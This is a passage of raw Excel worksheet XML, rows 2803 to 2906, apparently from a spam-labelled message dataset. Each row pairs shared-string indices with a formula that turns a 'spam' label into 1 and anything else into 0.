    <row r="2803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2803" t="s">
        <v>7967</v>
      </c>
      <c r="B2803" t="s">
        <v>5294</v>
      </c>
      <c r="C2803" s="1">
        <f>IF(B2803="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2804" t="s">
        <v>7968</v>
      </c>
      <c r="B2804" t="s">
        <v>5297</v>
      </c>
      <c r="C2804" s="1">
        <f>IF(B2804="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2805" t="s">
        <v>7969</v>
      </c>
      <c r="B2805" t="s">
        <v>5294</v>
      </c>
      <c r="C2805" s="1">
        <f>IF(B2805="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2806" t="s">
        <v>7970</v>
      </c>
      <c r="B2806" t="s">
        <v>5294</v>
      </c>
      <c r="C2806" s="1">
        <f>IF(B2806="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2807" t="s">
        <v>7971</v>
      </c>
      <c r="B2807" t="s">
        <v>5294</v>
      </c>
      <c r="C2807" s="1">
        <f>IF(B2807="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2808" t="s">
        <v>7972</v>
      </c>
      <c r="B2808" t="s">
        <v>5297</v>
      </c>
      <c r="C2808" s="1">
        <f>IF(B2808="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2809" t="s">
        <v>7973</v>
      </c>
      <c r="B2809" t="s">
        <v>5294</v>
      </c>
      <c r="C2809" s="1">
        <f>IF(B2809="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2810" t="s">
        <v>7974</v>
      </c>
      <c r="B2810" t="s">
        <v>5294</v>
      </c>
      <c r="C2810" s="1">
        <f>IF(B2810="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2811" t="s">
        <v>7975</v>
      </c>
      <c r="B2811" t="s">
        <v>5294</v>
      </c>
      <c r="C2811" s="1">
        <f>IF(B2811="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2812" t="s">
        <v>7976</v>
      </c>
      <c r="B2812" t="s">
        <v>5294</v>
      </c>
      <c r="C2812" s="1">
        <f>IF(B2812="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2813" t="s">
        <v>7090</v>
      </c>
      <c r="B2813" t="s">
        <v>5294</v>
      </c>
      <c r="C2813" s="1">
        <f>IF(B2813="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2814" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2814" t="s">
        <v>7977</v>
      </c>
      <c r="B2814" t="s">
        <v>5294</v>
      </c>
      <c r="C2814" s="1">
        <f>IF(B2814="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2815" t="s">
        <v>7978</v>
      </c>
      <c r="B2815" t="s">
        <v>5294</v>
      </c>
      <c r="C2815" s="1">
        <f>IF(B2815="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2816" t="s">
        <v>7979</v>
      </c>
      <c r="B2816" t="s">
        <v>5294</v>
      </c>
      <c r="C2816" s="1">
        <f>IF(B2816="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2817" t="s">
        <v>7980</v>
      </c>
      <c r="B2817" t="s">
        <v>5294</v>
      </c>
      <c r="C2817" s="1">
        <f>IF(B2817="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2818" t="s">
        <v>7981</v>
      </c>
      <c r="B2818" t="s">
        <v>5297</v>
      </c>
      <c r="C2818" s="1">
        <f>IF(B2818="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2819" t="s">
        <v>7982</v>
      </c>
      <c r="B2819" t="s">
        <v>5294</v>
      </c>
      <c r="C2819" s="1">
        <f>IF(B2819="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2820" t="s">
        <v>7983</v>
      </c>
      <c r="B2820" t="s">
        <v>5294</v>
      </c>
      <c r="C2820" s="1">
        <f>IF(B2820="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2821" t="s">
        <v>7984</v>
      </c>
      <c r="B2821" t="s">
        <v>5297</v>
      </c>
      <c r="C2821" s="1">
        <f>IF(B2821="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2822" t="s">
        <v>7985</v>
      </c>
      <c r="B2822" t="s">
        <v>5294</v>
      </c>
      <c r="C2822" s="1">
        <f>IF(B2822="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2823" t="s">
        <v>7986</v>
      </c>
      <c r="B2823" t="s">
        <v>5297</v>
      </c>
      <c r="C2823" s="1">
        <f>IF(B2823="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2824" t="s">
        <v>7987</v>
      </c>
      <c r="B2824" t="s">
        <v>5294</v>
      </c>
      <c r="C2824" s="1">
        <f>IF(B2824="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2825" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2825" t="s">
        <v>7988</v>
      </c>
      <c r="B2825" t="s">
        <v>5294</v>
      </c>
      <c r="C2825" s="1">
        <f>IF(B2825="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2826" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2826" t="s">
        <v>7989</v>
      </c>
      <c r="B2826" t="s">
        <v>5297</v>
      </c>
      <c r="C2826" s="1">
        <f>IF(B2826="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2827" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2827" t="s">
        <v>7804</v>
      </c>
      <c r="B2827" t="s">
        <v>5294</v>
      </c>
      <c r="C2827" s="1">
        <f>IF(B2827="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2828" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2828" t="s">
        <v>7990</v>
      </c>
      <c r="B2828" t="s">
        <v>5294</v>
      </c>
      <c r="C2828" s="1">
        <f>IF(B2828="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2829" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2829" t="s">
        <v>6166</v>
      </c>
      <c r="B2829" t="s">
        <v>5294</v>
      </c>
      <c r="C2829" s="1">
        <f>IF(B2829="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2830" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2830" t="s">
        <v>7991</v>
      </c>
      <c r="B2830" t="s">
        <v>5297</v>
      </c>
      <c r="C2830" s="1">
        <f>IF(B2830="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2831" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2831" t="s">
        <v>7187</v>
      </c>
      <c r="B2831" t="s">
        <v>5294</v>
      </c>
      <c r="C2831" s="1">
        <f>IF(B2831="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2832" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2832" t="s">
        <v>7992</v>
      </c>
      <c r="B2832" t="s">
        <v>5294</v>
      </c>
      <c r="C2832" s="1">
        <f>IF(B2832="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2833" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2833" t="s">
        <v>7993</v>
      </c>
      <c r="B2833" t="s">
        <v>5294</v>
      </c>
      <c r="C2833" s="1">
        <f>IF(B2833="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2834" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2834" t="s">
        <v>7994</v>
      </c>
      <c r="B2834" t="s">
        <v>5297</v>
      </c>
      <c r="C2834" s="1">
        <f>IF(B2834="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2835" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2835" t="s">
        <v>7995</v>
      </c>
      <c r="B2835" t="s">
        <v>5294</v>
      </c>
      <c r="C2835" s="1">
        <f>IF(B2835="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2836" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2836" t="s">
        <v>7996</v>
      </c>
      <c r="B2836" t="s">
        <v>5294</v>
      </c>
      <c r="C2836" s="1">
        <f>IF(B2836="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2837" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2837" t="s">
        <v>7997</v>
      </c>
      <c r="B2837" t="s">
        <v>5294</v>
      </c>
      <c r="C2837" s="1">
        <f>IF(B2837="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2838" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2838" t="s">
        <v>7998</v>
      </c>
      <c r="B2838" t="s">
        <v>5294</v>
      </c>
      <c r="C2838" s="1">
        <f>IF(B2838="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2839" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2839" t="s">
        <v>7999</v>
      </c>
      <c r="B2839" t="s">
        <v>5294</v>
      </c>
      <c r="C2839" s="1">
        <f>IF(B2839="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2840" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2840" t="s">
        <v>8000</v>
      </c>
      <c r="B2840" t="s">
        <v>5294</v>
      </c>
      <c r="C2840" s="1">
        <f>IF(B2840="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2841" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2841" t="s">
        <v>8001</v>
      </c>
      <c r="B2841" t="s">
        <v>5294</v>
      </c>
      <c r="C2841" s="1">
        <f>IF(B2841="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2842" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2842" t="s">
        <v>8002</v>
      </c>
      <c r="B2842" t="s">
        <v>5294</v>
      </c>
      <c r="C2842" s="1">
        <f>IF(B2842="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2843" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2843" t="s">
        <v>5715</v>
      </c>
      <c r="B2843" t="s">
        <v>5294</v>
      </c>
      <c r="C2843" s="1">
        <f>IF(B2843="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2844" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2844" t="s">
        <v>8003</v>
      </c>
      <c r="B2844" t="s">
        <v>5294</v>
      </c>
      <c r="C2844" s="1">
        <f>IF(B2844="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2845" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2845" t="s">
        <v>8004</v>
      </c>
      <c r="B2845" t="s">
        <v>5294</v>
      </c>
      <c r="C2845" s="1">
        <f>IF(B2845="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2846" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2846" t="s">
        <v>8005</v>
      </c>
      <c r="B2846" t="s">
        <v>5294</v>
      </c>
      <c r="C2846" s="1">
        <f>IF(B2846="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2847" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2847" t="s">
        <v>8006</v>
      </c>
      <c r="B2847" t="s">
        <v>5294</v>
      </c>
      <c r="C2847" s="1">
        <f>IF(B2847="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2848" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2848" t="s">
        <v>8007</v>
      </c>
      <c r="B2848" t="s">
        <v>5297</v>
      </c>
      <c r="C2848" s="1">
        <f>IF(B2848="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2849" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2849" t="s">
        <v>7371</v>
      </c>
      <c r="B2849" t="s">
        <v>5294</v>
      </c>
      <c r="C2849" s="1">
        <f>IF(B2849="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2850" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2850" t="s">
        <v>8008</v>
      </c>
      <c r="B2850" t="s">
        <v>5297</v>
      </c>
      <c r="C2850" s="1">
        <f>IF(B2850="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2851" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2851" t="s">
        <v>8009</v>
      </c>
      <c r="B2851" t="s">
        <v>5294</v>
      </c>
      <c r="C2851" s="1">
        <f>IF(B2851="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2852" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2852" t="s">
        <v>8010</v>
      </c>
      <c r="B2852" t="s">
        <v>5294</v>
      </c>
      <c r="C2852" s="1">
        <f>IF(B2852="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2853" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2853" t="s">
        <v>8011</v>
      </c>
      <c r="B2853" t="s">
        <v>5294</v>
      </c>
      <c r="C2853" s="1">
        <f>IF(B2853="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2854" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2854" t="s">
        <v>8012</v>
      </c>
      <c r="B2854" t="s">
        <v>5294</v>
      </c>
      <c r="C2854" s="1">
        <f>IF(B2854="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2855" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2855" t="s">
        <v>8013</v>
      </c>
      <c r="B2855" t="s">
        <v>5294</v>
      </c>
      <c r="C2855" s="1">
        <f>IF(B2855="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2856" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2856" t="s">
        <v>8014</v>
      </c>
      <c r="B2856" t="s">
        <v>5294</v>
      </c>
      <c r="C2856" s="1">
        <f>IF(B2856="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2857" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2857" t="s">
        <v>8015</v>
      </c>
      <c r="B2857" t="s">
        <v>5294</v>
      </c>
      <c r="C2857" s="1">
        <f>IF(B2857="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2858" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2858" t="s">
        <v>8016</v>
      </c>
      <c r="B2858" t="s">
        <v>5294</v>
      </c>
      <c r="C2858" s="1">
        <f>IF(B2858="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2859" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2859" t="s">
        <v>8017</v>
      </c>
      <c r="B2859" t="s">
        <v>5294</v>
      </c>
      <c r="C2859" s="1">
        <f>IF(B2859="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2860" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2860" t="s">
        <v>7022</v>
      </c>
      <c r="B2860" t="s">
        <v>5294</v>
      </c>
      <c r="C2860" s="1">
        <f>IF(B2860="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2861" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2861" t="s">
        <v>8018</v>
      </c>
      <c r="B2861" t="s">
        <v>5294</v>
      </c>
      <c r="C2861" s="1">
        <f>IF(B2861="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2862" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2862" t="s">
        <v>8019</v>
      </c>
      <c r="B2862" t="s">
        <v>5294</v>
      </c>
      <c r="C2862" s="1">
        <f>IF(B2862="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2863" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2863" t="s">
        <v>8020</v>
      </c>
      <c r="B2863" t="s">
        <v>5297</v>
      </c>
      <c r="C2863" s="1">
        <f>IF(B2863="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2864" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2864" t="s">
        <v>8021</v>
      </c>
      <c r="B2864" t="s">
        <v>5294</v>
      </c>
      <c r="C2864" s="1">
        <f>IF(B2864="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2865" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2865" t="s">
        <v>8022</v>
      </c>
      <c r="B2865" t="s">
        <v>5294</v>
      </c>
      <c r="C2865" s="1">
        <f>IF(B2865="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2866" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2866" t="s">
        <v>6797</v>
      </c>
      <c r="B2866" t="s">
        <v>5294</v>
      </c>
      <c r="C2866" s="1">
        <f>IF(B2866="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2867" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2867" t="s">
        <v>8023</v>
      </c>
      <c r="B2867" t="s">
        <v>5294</v>
      </c>
      <c r="C2867" s="1">
        <f>IF(B2867="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2868" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2868" t="s">
        <v>8024</v>
      </c>
      <c r="B2868" t="s">
        <v>5294</v>
      </c>
      <c r="C2868" s="1">
        <f>IF(B2868="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2869" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2869" t="s">
        <v>8025</v>
      </c>
      <c r="B2869" t="s">
        <v>5294</v>
      </c>
      <c r="C2869" s="1">
        <f>IF(B2869="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2870" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2870" t="s">
        <v>7892</v>
      </c>
      <c r="B2870" t="s">
        <v>5294</v>
      </c>
      <c r="C2870" s="1">
        <f>IF(B2870="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2871" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2871" t="s">
        <v>8026</v>
      </c>
      <c r="B2871" t="s">
        <v>5297</v>
      </c>
      <c r="C2871" s="1">
        <f>IF(B2871="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2872" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2872" t="s">
        <v>8027</v>
      </c>
      <c r="B2872" t="s">
        <v>5294</v>
      </c>
      <c r="C2872" s="1">
        <f>IF(B2872="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2873" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2873" t="s">
        <v>8028</v>
      </c>
      <c r="B2873" t="s">
        <v>5294</v>
      </c>
      <c r="C2873" s="1">
        <f>IF(B2873="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2874" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2874" t="s">
        <v>8029</v>
      </c>
      <c r="B2874" t="s">
        <v>5294</v>
      </c>
      <c r="C2874" s="1">
        <f>IF(B2874="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2875" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2875" t="s">
        <v>8030</v>
      </c>
      <c r="B2875" t="s">
        <v>5294</v>
      </c>
      <c r="C2875" s="1">
        <f>IF(B2875="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2876" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2876" t="s">
        <v>8031</v>
      </c>
      <c r="B2876" t="s">
        <v>5294</v>
      </c>
      <c r="C2876" s="1">
        <f>IF(B2876="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2877" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2877" t="s">
        <v>8032</v>
      </c>
      <c r="B2877" t="s">
        <v>5294</v>
      </c>
      <c r="C2877" s="1">
        <f>IF(B2877="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2878" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2878" t="s">
        <v>8033</v>
      </c>
      <c r="B2878" t="s">
        <v>5294</v>
      </c>
      <c r="C2878" s="1">
        <f>IF(B2878="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2879" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2879" t="s">
        <v>8034</v>
      </c>
      <c r="B2879" t="s">
        <v>5297</v>
      </c>
      <c r="C2879" s="1">
        <f>IF(B2879="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2880" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2880" t="s">
        <v>8035</v>
      </c>
      <c r="B2880" t="s">
        <v>5294</v>
      </c>
      <c r="C2880" s="1">
        <f>IF(B2880="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2881" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2881" t="s">
        <v>6079</v>
      </c>
      <c r="B2881" t="s">
        <v>5297</v>
      </c>
      <c r="C2881" s="1">
        <f>IF(B2881="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2882" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2882" t="s">
        <v>8036</v>
      </c>
      <c r="B2882" t="s">
        <v>5294</v>
      </c>
      <c r="C2882" s="1">
        <f>IF(B2882="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2883" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2883" t="s">
        <v>8037</v>
      </c>
      <c r="B2883" t="s">
        <v>5294</v>
      </c>
      <c r="C2883" s="1">
        <f>IF(B2883="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2884" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2884" t="s">
        <v>8038</v>
      </c>
      <c r="B2884" t="s">
        <v>5294</v>
      </c>
      <c r="C2884" s="1">
        <f>IF(B2884="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2885" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2885" t="s">
        <v>8039</v>
      </c>
      <c r="B2885" t="s">
        <v>5294</v>
      </c>
      <c r="C2885" s="1">
        <f>IF(B2885="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2886" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2886" t="s">
        <v>8040</v>
      </c>
      <c r="B2886" t="s">
        <v>5294</v>
      </c>
      <c r="C2886" s="1">
        <f>IF(B2886="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2887" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2887" t="s">
        <v>8041</v>
      </c>
      <c r="B2887" t="s">
        <v>5294</v>
      </c>
      <c r="C2887" s="1">
        <f>IF(B2887="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2888" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2888" t="s">
        <v>8042</v>
      </c>
      <c r="B2888" t="s">
        <v>5294</v>
      </c>
      <c r="C2888" s="1">
        <f>IF(B2888="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2889" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2889" t="s">
        <v>8043</v>
      </c>
      <c r="B2889" t="s">
        <v>5294</v>
      </c>
      <c r="C2889" s="1">
        <f>IF(B2889="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2890" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2890" t="s">
        <v>8044</v>
      </c>
      <c r="B2890" t="s">
        <v>5294</v>
      </c>
      <c r="C2890" s="1">
        <f>IF(B2890="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2891" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2891" t="s">
        <v>8045</v>
      </c>
      <c r="B2891" t="s">
        <v>5294</v>
      </c>
      <c r="C2891" s="1">
        <f>IF(B2891="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2892" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2892" t="s">
        <v>8046</v>
      </c>
      <c r="B2892" t="s">
        <v>5294</v>
      </c>
      <c r="C2892" s="1">
        <f>IF(B2892="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2893" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2893" t="s">
        <v>8047</v>
      </c>
      <c r="B2893" t="s">
        <v>5294</v>
      </c>
      <c r="C2893" s="1">
        <f>IF(B2893="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2894" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2894" t="s">
        <v>8048</v>
      </c>
      <c r="B2894" t="s">
        <v>5294</v>
      </c>
      <c r="C2894" s="1">
        <f>IF(B2894="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2895" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2895" t="s">
        <v>8049</v>
      </c>
      <c r="B2895" t="s">
        <v>5294</v>
      </c>
      <c r="C2895" s="1">
        <f>IF(B2895="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2896" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2896" t="s">
        <v>8050</v>
      </c>
      <c r="B2896" t="s">
        <v>5294</v>
      </c>
      <c r="C2896" s="1">
        <f>IF(B2896="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2897" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2897" t="s">
        <v>8051</v>
      </c>
      <c r="B2897" t="s">
        <v>5297</v>
      </c>
      <c r="C2897" s="1">
        <f>IF(B2897="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2898" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2898" t="s">
        <v>8052</v>
      </c>
      <c r="B2898" t="s">
        <v>5294</v>
      </c>
      <c r="C2898" s="1">
        <f>IF(B2898="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2899" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2899" t="s">
        <v>7566</v>
      </c>
      <c r="B2899" t="s">
        <v>5294</v>
      </c>
      <c r="C2899" s="1">
        <f>IF(B2899="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2900" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2900" t="s">
        <v>8053</v>
      </c>
      <c r="B2900" t="s">
        <v>5294</v>
      </c>
      <c r="C2900" s="1">
        <f>IF(B2900="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2901" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2901" t="s">
        <v>8054</v>
      </c>
      <c r="B2901" t="s">
        <v>5294</v>
      </c>
      <c r="C2901" s="1">
        <f>IF(B2901="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2902" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2902" t="s">
        <v>8055</v>
      </c>
      <c r="B2902" t="s">
        <v>5297</v>
      </c>
      <c r="C2902" s="1">
        <f>IF(B2902="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2903" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2903" t="s">
        <v>8056</v>
      </c>
      <c r="B2903" t="s">
        <v>5294</v>
      </c>
      <c r="C2903" s="1">
        <f>IF(B2903="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2904" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2904" t="s">
        <v>8057</v>
      </c>
      <c r="B2904" t="s">
        <v>5294</v>
      </c>
      <c r="C2904" s="1">
        <f>IF(B2904="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2905" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2905" t="s">
        <v>8058</v>
      </c>
      <c r="B2905" t="s">
        <v>5294</v>
      </c>
      <c r="C2905" s="1">
        <f>IF(B2905="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2906" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2906" t="s">
        <v>8059</v>
      </c>
      <c r="B2906" t="s">
        <v>5294</v>
      </c>
      <c r="C2906" s="1">
        <f>IF(B2906="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
